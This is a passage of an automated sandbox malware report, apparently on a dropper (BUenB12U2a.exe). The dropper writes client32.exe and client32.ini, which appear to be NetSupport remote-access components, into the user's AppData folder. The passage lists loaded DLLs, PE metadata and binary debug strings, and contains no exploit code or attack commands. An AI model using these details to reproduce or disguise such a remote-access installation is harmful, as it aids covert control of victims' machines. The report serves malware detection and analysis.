                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: msvcr100.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: wtsapi32.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: nsmtrace.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: devobj.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: pcicl32.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: shfolder.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: pcichek.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: pcicapi.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: msvcr100.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: wtsapi32.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: nsmtrace.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: devobj.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Section loaded: msasn1.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{75048700-EF1F-11D0-9888-006097DEACF9}\InProcServer32
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe File written: C:\Users\user\AppData\Roaming\extracted\client32.ini
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Window Recorder Window detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: BUenB12U2a.exe Static PE information: Image base 0x140000000 > 0x60000000
                                Source: BUenB12U2a.exe Static file information: File size 33884861 > 1048576
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe File opened: C:\Users\user\AppData\Roaming\extracted\MSVCR100.dll
                                Source: BUenB12U2a.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: BUenB12U2a.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: BUenB12U2a.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: BUenB12U2a.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: BUenB12U2a.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: BUenB12U2a.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: BUenB12U2a.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: BUenB12U2a.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718897846.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715627674.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: m\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdb source: BUenB12U2a.exe, 00000001.00000002.2046118971.00007FFDFB858000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715143617.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717697238.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718412389.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716414194.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718514366.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715926087.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716116780.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718313895.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: BUenB12U2a.exe, 00000001.00000002.2048240010.00007FFE13320000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718412389.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716720343.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719242514.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714954517.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717906121.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716627073.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047237276.00007FFE11EBC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717153712.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1715439018.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715439018.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715542957.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718313895.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719242514.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715737864.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715345292.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715833362.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdb source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578656714.0000000072A02000.00000002.00000001.01000000.00000018.sdmp, client32.exe, 00000009.00000002.1882967027.0000000072A02000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717697238.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717594095.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdbOGPS source: BUenB12U2a.exe, 00000001.00000002.2046118971.00007FFDFB858000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716627073.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: BUenB12U2a.exe, 00000000.00000003.1713211636.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2048699766.00007FFE1A473000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\re source: BUenB12U2a.exe, 00000001.00000003.1792443499.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716319151.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717379256.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719097973.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1716837900.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715143617.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716221103.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716319151.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716520545.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047920798.00007FFE13303000.00000002.00000001.01000000.0000000D.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717268731.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714954517.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718799711.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719353500.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716019575.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717482852.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717268731.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdb source: BUenB12U2a.exe, 00000001.00000002.2043270847.00007FFDFB134000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718514366.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719097973.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: BUenB12U2a.exe, 00000001.00000002.2046552473.00007FFE1024D000.00000002.00000001.01000000.0000000E.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718614963.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716414194.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719004065.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: BUenB12U2a.exe, 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000000.1797525197.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000006.00000002.3573445263.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000009.00000002.1881091510.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000009.00000000.1879479005.0000000000A62000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAF59000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713211636.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2048699766.00007FFE1A473000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718008281.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715926087.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717482852.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: BUenB12U2a.exe, 00000001.00000003.1791653644.0000020E48128000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48128000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3577865426.000000006CB81000.00000020.00000001.01000000.0000001A.sdmp
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718717319.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715833362.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717804451.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2046822337.00007FFE10307000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715244071.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716720343.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715542957.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715345292.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717594095.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718208410.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718799711.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718008281.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715052639.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047481292.00007FFE11EDD000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715244071.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\htctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047013819.00007FFE11518000.00000002.00000001.01000000.0000000C.sdmp
